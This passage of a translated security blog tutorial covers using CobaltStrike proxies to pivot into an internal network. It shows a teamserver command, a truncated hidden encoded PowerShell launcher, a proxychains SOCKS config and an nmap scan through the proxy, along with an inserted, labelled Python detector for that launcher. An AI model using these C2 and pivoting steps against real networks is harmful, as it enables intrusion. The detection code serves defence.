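Statement: I firmly oppose using the content of this article for malicious attacks; all wrongdoing will be punished. A clean internet depends on all of us to maintain it, and I encourage everyone, on the basis of understanding the technical principles, to better protect personal information security, enterprise security, and national security.
The attack machine used here runs Kali Linux, and the main tools involved in the attack are proxychains, nmap, and others. The attack topology is shown in the figure below.
First, start the CobaltStrike team server by running the following command: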
./teamserver 192.168.43.137 xxxxxx
powershell -nop -w hidden -encodedcommand ...
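For defenders, the `powershell -nop -w hidden -encodedcommand` launcher line above is a useful detection anchor in process-creation logs. The following is an added example, not code from the original article: the function names, the harmless sample script, and the sample command lines are all constructed for illustration.

```python
import base64
import binascii

POWERSHELL = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}

def flag_matches(token, name, min_len=1, aliases=()):
    """PowerShell accepts unambiguous prefixes of a parameter name (-w, -nop, -enc)."""
    if not token.startswith(("-", "/")):
        return False
    short = token[1:].lower()
    return short in aliases or (len(short) >= min_len and name.startswith(short))

def decode_payload(b64):
    """-EncodedCommand takes base64 of UTF-16LE text; return None if it is not that."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze(cmdline):
    """Return None for non-PowerShell processes, else flags seen and the decoded script."""
    tokens = cmdline.split()  # simplification: assumes no spaces inside the image path
    if not tokens or tokens[0].lower().rsplit("\\", 1)[-1] not in POWERSHELL:
        return None
    flags, decoded, i = set(), None, 1
    while i < len(tokens):
        tok = tokens[i]
        value = tokens[i + 1] if i + 1 < len(tokens) else ""
        if flag_matches(tok, "encodedcommand", aliases=("ec",)):
            flags.add("encoded")
            decoded = decode_payload(value)
            i += 1  # skip the payload token
        elif flag_matches(tok, "windowstyle") and value.lower() == "hidden":
            flags.add("hidden")
            i += 1  # skip the window-style value
        elif flag_matches(tok, "noprofile", min_len=3):
            flags.add("noprofile")
        i += 1
    # Encoded command plus hidden window is the combination seen in the launcher line.
    return {"flags": flags, "decoded": decoded,
            "suspicious": {"encoded", "hidden"} <= flags}

# Constructed sample data: a harmless script and made-up process command lines.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "powershell -nop -w hidden -encodedcommand " + B64,
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -WindowStyle Hidden -enc " + B64,
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "cmd.exe /c dir",
]
```

Matching on parameter prefixes rather than on the literal string matters because the same launcher can be written with `-enc`, `-e`, or `-WindowStyle Hidden`, and decoding the payload gives the analyst the script that was actually run.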
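Install a proxy extension in Firefox and set up a SOCKS proxy. Once this is configured, the web application on the internal host 192.168.237.129 can be accessed successfully. The relevant configuration is shown below: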
--- snippet ---
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 23612
>>> proxychains nmap -sT -Pn 192.168.237.129
Originally published on the WeChat official account 安全攻防之道: CobaltStrike Series | Using CobaltStrike Proxies